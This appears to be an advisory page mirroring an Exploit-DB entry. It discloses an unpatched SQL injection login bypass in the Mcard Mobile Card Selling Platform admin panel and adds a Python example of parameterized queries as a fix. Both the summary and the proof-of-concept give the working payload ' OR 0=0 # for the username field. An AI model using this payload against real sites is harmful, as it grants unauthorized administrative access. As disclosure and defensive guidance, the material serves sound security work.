Vendor: Mcard Mobile Card Selling Platform
By: L0RD
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Mcard Mobile Card Selling Platform
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:codecanyon:mcard_mobile_card_selling_platform
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2018

Mcard Mobile Card Selling Platform 1 – SQL Injection

An attacker can bypass admin panel authentication by entering ' OR 0=0 # as the Username, with any Password.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
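
One way to apply this mitigation, as an added example that is not part of the original advisory or the product's code: bind the username as a query parameter and verify the password outside SQL. The table schema, function names, sample credentials and the concatenated query shape are assumptions, and an in-memory SQLite database stands in for the product's database.

```python
import hashlib
import hmac
import os
import sqlite3

# Added example. Schema, names and sample credentials are constructed assumptions.

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """In-memory SQLite stand-in for the admin table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO admins VALUES (?, ?, ?)",
               ("admin", salt, _hash("correct horse", salt)))
    return db

def concatenated_sql(username, password):
    """Assumed vulnerable pattern: input pasted into the SQL text.
    Built here only to inspect the resulting string; it is never executed."""
    return ("SELECT * FROM admins WHERE username = '" + username +
            "' AND password = '" + password + "'")

def login(db, username, password):
    """Hardened check: the username is bound as data, so quotes and '#'
    cannot change the query; the password is compared outside SQL."""
    row = db.execute("SELECT salt, pw_hash FROM admins WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    salt, pw_hash = row
    return hmac.compare_digest(_hash(password, salt), pw_hash)

if __name__ == "__main__":
    db = make_db()
    # With concatenation the quote closes the string early, and in MySQL
    # '#' comments out the password clause that follows.
    print(concatenated_sql("' OR 0=0 #", "anything"))
    print(login(db, "' OR 0=0 #", "anything"))
    print(login(db, "admin", "correct horse"))
```
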

Exploit-DB raw data:

# Exploit Title: Mcard Mobile Card Selling Platform 1 - SQL Injection
# Date: 2018-05-23
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/mcard-mobile-card-selling-platform/19307193?s_rank=15
# Version: 1
# Tested on: Kali linux

# POC 1 :

# Attacker can bypass admin panel authentication
Username : ' OR 0=0 #
Password : anything